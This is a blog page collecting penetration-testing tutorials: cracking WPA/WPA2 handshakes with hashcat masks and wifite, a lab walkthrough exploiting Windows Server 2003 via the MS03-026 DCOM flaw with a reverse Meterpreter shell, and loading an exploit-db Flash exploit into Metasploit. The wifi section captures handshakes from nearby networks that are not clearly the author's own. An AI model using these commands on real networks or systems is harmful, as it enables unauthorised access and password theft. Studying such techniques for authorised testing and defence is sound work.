All posts by ashihaldia

CRACKING WiFi WPA WPA2 WITH HASHCAT ON KALI LINUX (BRUTEFORCE MASK BASED ATTACK ON WIFI PASSWORDS)

Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat, oclHashcat and Hashcat on Kali Linux have built-in support for recovering WPA/WPA2 pre-shared keys from a captured 4-way handshake (.cap file). The handshake does not contain the password itself: hashcat derives the key material from each candidate passphrase and checks it against the MIC in the captured frames. The only constraint is that you need to convert the .cap file to the .hccap format first. This is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should buy a card that supports Kali Linux, including packet injection and monitor mode. A list can be found in 802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you'll just be wasting time and effort on something that won't do the job.

My Setup

I have an NVIDIA GTX 210 graphics card in my machine running Kali Linux 1.0.6 and will use the rockyou dictionary for most of the exercise. In this post, I will show how to crack a WPA/WPA2 handshake file (.cap file) with cudaHashcat, oclHashcat or Hashcat on Kali Linux.

I will use the cudahashcat command because I am using an NVIDIA GPU. If you're using an AMD GPU, then you'll be using oclHashcat instead. Let me know if this assumption is incorrect. (Since hashcat 3.0 the CUDA and OpenCL builds have been merged into a single hashcat binary, so on a current Kali you simply type hashcat wherever cudahashcat or oclhashcat appears below.)

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

  1. Because we can?
  2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn't explain much, and reading the Hashcat wiki would take forever to explain how to do it. I'll just give some examples to clear it up.

Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ (the 33 printable symbols, starting with the space character)

?a = ?l?u?d?s

Numbered passwords

So let's say your password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you're trying every 8-digit numeric password: 12345678, 23456789, 01567891 and so on, 10^8 candidates in all. You get the idea.

Letter passwords – All uppercase

If your password is all letters in CAPS such as ABCDEFGH, LKHJHIOP or ZBTGYHQS, then you can use the following MASK:

?u?u?u?u?u?u?u?u

It will crack all 8 Letter passwords in CAPS.

Letter passwords – All lowercase

If your password is all lowercase letters such as abcdefgh, dfghpoiu or bnmiopty, then you can use the following MASK:

?l?l?l?l?l?l?l?l

It will crack all 8-letter lowercase passwords. I hope you now see where I am going with this.

Passwords – Lowercase letters and numbers

If you know your password is similar to this: a1b2c3d4, p9o8i7u6 or n4j2k5l6 etc., then you can use the following MASK:

?l?d?l?d?l?d?l?d

Passwords – Uppercase letters and numbers

If you know your password is similar to this: A1B2C3D4, P9O8I7U6 or N4J2K5L6 etc., then you can use the following MASK:

?u?d?u?d?u?d?u?d

Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If your password is completely random, then you can just use a MASK like the following:

?a?a?a?a?a?a?a?a

Note: ?a represents any printable ASCII character (95 possibilities per position), so an 8-character ?a mask is 95^8, roughly 6.6 x 10^15 candidates. I hope you're getting the idea.

If you are absolutely not sure, you can just use one of the predefined .hcmask files and leave it running. But yeah, come back to check in a million years for a really long password. A dictionary attack is likely to have more success in that scenario.

Passwords – when you know a few characters

If you somehow know a few characters of the password, this makes things a lot faster. For every known character you save an immense amount of computing time, and mask files let you combine several guesses about the structure. Let's say your 8-character password starts with abc and doesn't contain any special characters. Then you can create a MASK file (.hcmask, one mask per line) containing the following:

abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u?d?d?l
abc?d?d?l?u?l

Note that a mask does not list passwords, it describes a keyspace: each ?l stands for 26 possibilities, ?u for 26 and ?d for 10, so the first line alone covers 26^5 = 11,881,376 candidates and the five lines together about 27.4 million. That is still tiny compared with the 95^8 of a blind ?a mask, which is why known characters matter so much. (A literal question mark inside a mask is written as ??, so a stray double ? silently changes what the mask means. Also remember that WPA/WPA2 passphrases are 8 to 63 characters long; hashcat skips shorter masks for this hash type.) This is the true power of using cudaHashcat, oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can narrow it down further if you know how a person builds passwords. Some people always use an UPPERCASE letter as the first character, then a few lowercase letters, and finish with numbers.

Example: Abcde123

Your mask will be:

?u?l?l?l?l?d?d?d

This will make cracking significantly faster (26 x 26^4 x 10^3 is under 12 billion candidates, against 95^8 for a blind ?a mask). Social engineering is the key here.
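To make the keyspace arithmetic behind the masks above concrete, here is an added example (my own code, not part of the original post or of hashcat) that parses hashcat mask syntax, including the ?? escape for a literal question mark and the custom ?1..?4 charsets an .hcmask line can define, and counts the candidates a mask or a whole .hcmask file would generate for WPA/WPA2. The sample mask file and the 10 kH/s rate in the usage line are constructed for illustration; everything else follows hashcat's documented mask rules.

```python
import re

# Built-in hashcat charsets. ?s is the 33 printable ASCII symbols, including
# the leading space and the backslash; ?a is the union of ?l ?u ?d ?s (95 chars).
BUILTIN = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def mask_positions(mask, custom=None):
    """Turn a mask such as 'abc?l?d??x' into one charset string per output position.

    '?x' expands to a built-in (?l ?u ?d ?s ?a ?h ?H) or custom (?1..?4) charset,
    '??' is a literal question mark, any other character is literal.
    """
    custom = custom or {}
    positions = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch == "?" and i + 1 < len(mask):
            nxt = mask[i + 1]
            if nxt == "?":
                positions.append("?")
            elif nxt in BUILTIN:
                positions.append(BUILTIN[nxt])
            elif nxt in custom:
                positions.append(custom[nxt])
            else:
                raise ValueError(f"unknown charset ?{nxt} in mask {mask!r}")
            i += 2
        else:
            positions.append(ch)
            i += 1
    return positions


def expand_charset(spec, custom=None):
    """A custom charset definition (-1 '?l?d', -2 'abc?1') uses mask syntax itself; return its distinct chars."""
    return "".join(sorted(set("".join(mask_positions(spec, custom)))))


def parse_hcmask_line(line):
    """Split one .hcmask line into ({'1': charset, ...}, mask).

    Fields are comma separated; the last field is the mask and the ones before it
    define ?1 to ?4 in order. A literal comma is escaped as '\\,'.
    """
    fields = [f.replace("\\,", ",") for f in re.split(r"(?<!\\),", line.strip())]
    *charsets, mask = fields
    custom = {}
    for n, spec in enumerate(charsets, start=1):
        custom[str(n)] = expand_charset(spec, custom)  # later charsets may reference earlier ones
    return custom, mask


def wpa_candidate_count(mask, custom=None):
    """Number of candidates one mask generates for WPA/WPA2 (0 if the length is outside 8..63)."""
    positions = mask_positions(mask, custom)
    if not 8 <= len(positions) <= 63:
        return 0  # WPA passphrases are 8-63 chars; hashcat skips such masks for -m 2500
    total = 1
    for charset in positions:
        total *= len(charset)
    return total


def hcmask_candidate_count(text):
    """Sum the candidates over every non-comment, non-empty line of an .hcmask file."""
    total = 0
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        custom, mask = parse_hcmask_line(line)
        total += wpa_candidate_count(mask, custom)
    return total


def estimate_hours(candidates, hashes_per_second):
    """Worst-case run time at a given WPA speed, e.g. the H/s hashcat prints in its status line."""
    return candidates / hashes_per_second / 3600


# Constructed sample: the five-line mask file from the post above plus one line
# that defines a custom charset ?1 = lowercase + digits.
SAMPLE_HCMASK = """\
# 8-char passwords starting with 'abc', no special characters
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u?d?d?l
abc?d?d?l?u?l
?l?d,abc?1?1?1?1?1
"""

if __name__ == "__main__":
    for line in SAMPLE_HCMASK.splitlines():
        if line and not line.startswith("#"):
            custom, mask = parse_hcmask_line(line)
            print(f"{mask:24s} {wpa_candidate_count(mask, custom):>14,d}")
    total = hcmask_candidate_count(SAMPLE_HCMASK)
    print(f"total {total:,d} candidates, ~{estimate_hours(total, 10_000):.1f} h at 10 kH/s")
```

Note that the number hashcat prints for --keyspace is not this count: it is the size of the outer loop hashcat uses to split the work, so use a candidate count like this one when estimating run time from the H/s figure in hashcat's status output.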

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of other guides that use Aircrack-ng? Because we don't have to type in as many commands.

Type in the following command in your Kali Linux terminal:

wifite --wpa

You could also type in

wifite --wpa2

If you want to see everything (WEP, WPA and WPA2), just type the following command. It doesn't make any difference except a few more minutes:

wifite

Once you type in following is what you’ll see.

1 - Wifite - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

So, we can see a bunch of Access Points (APs for short). Always try to go for the ones with CLIENTS, because a handshake is only captured when a client (re)authenticates, so it's much faster. You can choose all or pick by number. See the screenshot below.

2 - Wifite Screen - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Awesome, we've got a few with clients attached. I will pick 1 and 2 because they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything, if anything at all.

So I've picked 1 and 2. Press Enter to let WiFite do its magic.

3 - WiFite Choice - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Once you press ENTER, the following is what you will see. I got impatient as choice number 1 wasn't doing anything for a LONG time, so I pressed CTRL+C to quit out of it.

This is actually a great feature of Wifite. It now asks me:

What do you want to do?

  1. [c]ontinue attacking targets
  2. [e]xit completely.

I can type c to continue or e to exit. This is the feature I was talking about. I typed c to continue, which skips choice 1 and starts attacking choice 2. This is a great feature because not all routers, APs or targets respond to an attack the same way. You could of course wait and eventually get a response, but if you're just after ANY AP, it saves time.

4 - WiFite continue - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

And voila, it took only a few seconds to capture a handshake. This AP had lots of clients, so one of them reconnected quickly and I got the handshake.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there are no more APs to attack, Wifite will just quit and you get your prompt back.

5 - WiFite captured handshake - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Now that we have a capture file with a handshake in it, we can do a few things.

Cleanup your cap file using wpaclean

The next step is converting the .cap file to a format cudaHashcat, oclHashcat or Hashcat on Kali Linux will understand. wpaclean first strips the capture down to the beacon and EAPOL handshake frames, which keeps the converted file small and avoids confusing the converter with unrelated traffic.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that the wpaclean arguments are the "wrong" way round: <out.cap> <in.cap> instead of <in.cap> <out.cap>, which may cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat, oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with aircrack-ng we need to use the -J option:

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capital J, not a lower case j, and aircrack-ng appends the .hccap extension itself. (The .hccap format belongs to the hashcat versions of the Kali 1.x era. hashcat 3.40 and later use the .hccapx format for -m 2500, and hashcat 6.0 and later use -m 22000 with a .hc22000 file produced by hcxpcapngtool from the hcxtools package: hcxpcapngtool -o out.hc22000 capture.cap. On a current system do that conversion instead and replace -m 2500 with -m 22000 in the commands below.)

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 1

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios:

  1. Dictionary attack
  2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which hash mode to use for a WPA/WPA2 handshake file. I've covered this at length in the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux guide. Here's a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 2

Bingo, I used a common password for this wireless AP, so it took only a few seconds to crack. Depending on your dictionary size, it might take a while.

You should remember that if you're going to use a dictionary attack, Pyrit would be much faster than cudaHashcat, oclHashcat or Hashcat on the hardware of the day. Why are we showing this here? Because we can. :)

Another guide explains how a dictionary attack works in detail, so I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary attacks in full.

Brute-Force Attack

Now this is the main part of this guide: using a brute-force MASK attack.

To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:

Sample:

cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m 2500 means we are attacking a WPA/WPA2 handshake file.

-a 3 means we are using brute-force attack mode (this is the mode that takes a MASK).

capture.hccap is your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d is your MASK, where ?d = digit. That means the password is all numbers and exactly 8 digits long, i.e. 12345678, 00000000 or anything in between. Eight positions is the shortest mask worth running, since WPA/WPA2 passphrases are 8 to 63 characters long.

I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask.

/usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Do the following to see all the default MASK files shipped with cudaHashcat, oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 3

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 4

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat, cudaHashcat and oclHashcat save every recovered password, together with its hash, in a potfile. With the Kali 1.x builds this is hashcat.pot in the directory you ran the command from; in my case I ran everything from my home directory, /root. (Current hashcat releases write hashcat.potfile in the hashcat directory or under ~/.hashcat/, and hashcat --show -m 2500 out.hccap prints the cracked entry for a given capture.)

cat hashcat.pot

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 5

802.11 Recommended USB Wireless Cards for Kali Linux


This post lists some of the best performing, supported and recommended USB Wireless Cards for Kali Linux.

There isn’t a “best” card. There is whatever is right for YOU.

The following USB wireless cards appear to work with Kali Linux (i.e. monitor mode, injection etc.).

*Note* These are not in any type of order *Note*

A common problem in pentest distros such as Kali or BackTrack Linux is users trying to use a card that is not supported or for which there simply isn't a working driver. Most of the following cards are priced below US$50 and they take care of a massive headache: your time goes into actually doing something rather than troubleshooting driver issues. With each update the makeshift driver fixes tend to break, and you end up doing the whole thing again and again. The following guide generated a lot of emails and personal requests from users who were not able to make it work properly just because their Wi-Fi card wasn't on the list of recommended wireless cards for Kali Linux.

2.4GHz

 

Rokland N3

http://store.rokland.com/products/th…b-for-macs-pcs

$32.97 from Rokland

 

Alfa AWUS036NHA

http://www.alfa.com.tw/products_show.php?pc=34&ps=20

$32.99 from Amazon

 

TP-Link WN722N

http://uk.tp-link.com/products/detai…TL-WN722N#spec

$15.18 from Amazon

 

Linksys WUSB54GC v1

http://support.linksys.com/en-us/support/adapters/WUSB54GC

$25.00 from Amazon

 

5GHz (& 2.4GHz)

 

Rosewill RNX-N600UBE

http://www.rosewill.com/products/182…ifications.htm

$32.66 from Amazon

 

Other useful links

Prices change over time and from country to country, so treat the figures above as a rough guide only. Places that have been known to stock the mentioned cards:

If you have a different card feel free to share here which will probably help another user someday.

Side Note:

I've compiled a small list (these are the only 8 laptops I could find that match my personal criteria) of laptops that are Linux compatible and have NVIDIA GeForce graphics cards. (I've tried to avoid AMD/ATI as there has been some inconsistency lately with their proprietary Linux drivers and heating issues; sorry AMD, take Linux users more seriously next time.) NVIDIA seems more stable and gives you more options. Feel free to check this list and add comments about which one you have or prefer.

 

“No responsibility is taken for the correctness of this information.” == Double check before purchasing.

 

Conclusion

Or maybe you would like to turn a Kindle device into your portable Kali installation? The possibilities are endless.

HOW TO HACK WINDOWS 2003 SERVER WITH METASPLOIT

How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a detailed step-by-step guide on how to pentest a remote PC (Windows 2003 Server) with Metasploit. I've used BackTrack 5 and Windows 2003 Server in a virtual environment. The ease of pentesting is scary, and readers and sysadmins are advised to update their Windows 2003 servers to the latest patch/service pack and use additional antivirus and firewalls to protect them from a similar situation. (Windows Server 2003 reached end of support in July 2015, so no new patches exist; the real fix for an exposed 2003 box is to retire it.) The author takes no responsibility for how this tutorial is used by readers; it is for educational purposes only.

Introduction

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

http://www.backtrack-linux.org/downloads/

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and most preferred work area is the 'msfconsole'. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing search along with a keyword lists the modules whose name or description matches that keyword.
  2. show exploits : Lists all currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache and so on, which help to test the flexibility and understand the workings of Metasploit.
  3. show payloads : With the same 'show' command we can also list the available payloads. Once an exploit is selected, 'show payloads' only lists the payloads compatible with it.
  4. show options : Shows the options you have set and possibly the ones you have forgotten to set. Each exploit and payload comes with its own options.
  5. info : If you want specific information on an exploit or payload, use the 'info' command, e.g. 'info exploit/windows/dcerpc/ms03_026_dcom' or 'info payload windows/meterpreter/reverse_tcp'.
  6. use : Tells Metasploit to use the exploit with the specified name.
  7. set RHOST : Sets the remote host, i.e. the target, for the exploit.
  8. set RPORT : Sets the port Metasploit will connect to on the remote host.
  9. set PAYLOAD : Selects the payload that runs on the target once the service is exploited, for example one that gives you a shell.
  10. set LPORT : For a reverse payload this is the port your own machine listens on for the connection back, so it must be free on the attacking machine; for a bind payload it is the port opened on the target. Pick an unused port above 1024 (4444 is the conventional default).
  11. exploit : Actually runs the exploit. Another version, rexploit, reloads your exploit code and then executes it, which lets you try minor changes to the exploit code without restarting the console.
  12. help : Gives basic information on all the commands not listed here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003
IP: 192.168.42.129

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128

Objective

The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server 192.168.42.129.
The output of the nmap scan shows a range of open ports, which can be seen in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that port 135 (the MSRPC endpoint mapper) is open. So we can look for a matching exploit module in Metasploit to gain shell access, if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now we know that port 135 is open, so we search for a related RPC exploit in Metasploit.
To list all the exploits supported by Metasploit we use the "show exploits" command. This command lists all the currently available exploits, and a small portion of the output is shown in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile, so finding a specific exploit in this huge list would be a tedious task. So we use a better option. You can either visit http://metasploit.com/modules/ or use the "search" command in Metasploit to search for exploits related to RPC.
In msfconsole type "search dcerpc" to search for all the exploits related to the dcerpc keyword, since an exploit of that family can be used to gain access to a server with a vulnerable port 135. A list of all the related exploits is presented in the msfconsole window, as shown in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of RPC exploits in front of you, we need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command "info exploit/windows/dcerpc/ms03_026_dcom", which provides information such as available targets, exploit requirements, details of the vulnerability itself, and references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST 192.168.42.129” and we see that the RHOST is set to 192.168.42.129

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case we are using the reverse TCP Meterpreter payload, set with the command "set PAYLOAD windows/meterpreter/reverse_tcp", which gives us a Meterpreter session if the remote server is successfully exploited. Now again you must view the available options using "show options" to make sure all the required fields are filled in so that the exploit launches properly.

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for our payload is not set, so we set it to our local IP, i.e. 192.168.42.128, using the command "set LHOST 192.168.42.128". LHOST is the address the reverse connection comes back to, so it must be reachable from the target.

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the "check" command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all exploits, but it can be a really good support before you actually exploit the remote server, to make sure the remote server is not patched against the exploit you are trying.

In our case, as shown in the figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 through the vulnerable RPC service on port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been set up between the victim and our machine, we control the server with the privileges of the exploited RPC service.

We can use the help command to see which commands we can run on the remote server to perform the related actions, as displayed in the figure below.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops

Add new exploits to Metasploit from Exploit-db

All this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not updated ones. Now it's time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty hard to break into. Now we will move into the world of real pentesting, and the first step is an introduction to exploit-db.




Exploit-db

As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)


Now, what exploit-db really is, is nothing more than a database where pentesters who write an exploit for a vulnerability upload its source code for other pentesters to see. It is maintained by Offensive Security (the force behind BackTrack, Kali and Metasploit Unleashed). The exploit-db.com site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it.

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggests that the exploit can be found here:

exploit/windows/browser/adobe_flash_pixel_bender_bof

But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it's there if you update Metasploit regularly or if you are reading this tutorial a long time after it was written. Either way, the method does not differ even if the exploit is already there, so don't worry. You can also use a different exploit of your liking; just replace the name wherever you see it used in the commands).

Now there are two alternatives. First, update the Metasploit framework using

msfupdate

This will update the framework with new modules. (On current Kali releases msfupdate is deprecated and the framework is updated through apt, e.g. apt update && apt install metasploit-framework.)

The second alternative is to download the exploit from exploit-db and put it in the ~/.msf4/modules/exploits/<your_folder> directory. Any exploit put there is picked up by Metasploit when it starts and shows up when you type use exploit/<your_folder>/<exploit_name>. While <your_folder> is arbitrary and can be set to any value, it is recommended to mirror the framework's own directory structure, so this exploit should be placed in ~/.msf4/modules/exploits/windows/browser/. It is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploits/ or you won't be able to use them. For newcomers to Linux, here is a detailed step-by-step guide.

Get the exploit

For example's sake, we'll use the Adobe shader exploit from http://www.exploit-db.com/exploits/33333/ Click on the Save icon to download the exploit. Save it on your Kali Desktop.

.msf4 directory method

Now if you are not well versed with Linux, you will need help with creating the directory and placing the file there. Although I'm guiding you through it, you should be proficient in Linux usage and able to do basic things like this at least. You can either use the command line to create the directories or do it with the GUI.

Command line method

First, say hi to mkdir

mkdir --help
Usage: mkdir [OPTION]... DIRECTORY...
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, --mode=MODE   set file mode (as in chmod), not a=rwx - umask
  -p, --parents     no error if existing, make parent directories as needed
  -v, --verbose     print a message for each created directory
  -Z, --context=CTX  set the SELinux security context of each created
                      directory to CTX
      --help     display this help and exit
      --version  output version information and exit

First we'll move to the directory that already exists (you need to be in your home directory for this to work; just type cd if unsure and it will take you there):

root@kali:~# cd .msf4/modules/

To see what the directory has, execute ls. It will return nothing, as the directory is empty.

root@kali:~/.msf4/modules# ls

Now we'll use mkdir to create what we need.

root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser

If you read the mkdir help, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as

root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser

Now meet cp

root@kali:~# cp --help
Usage: cp [OPTION]... [-T] SOURCE DEST
  or:  cp [OPTION]... SOURCE... DIRECTORY
  or:  cp [OPTION]... -t DIRECTORY SOURCE...
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.

Assume you have the adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands (the file must land in the browser subdirectory, not one level up in windows, or Metasploit will file it under the wrong path):

root@kali:~# ls
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser

Now check for yourself

root@kali:~/Desktop# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls
adobe_flash_pixel_bender_bof.rb

GUI Method

Go to computer -> Filesystem->Home. Now you won’t see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.

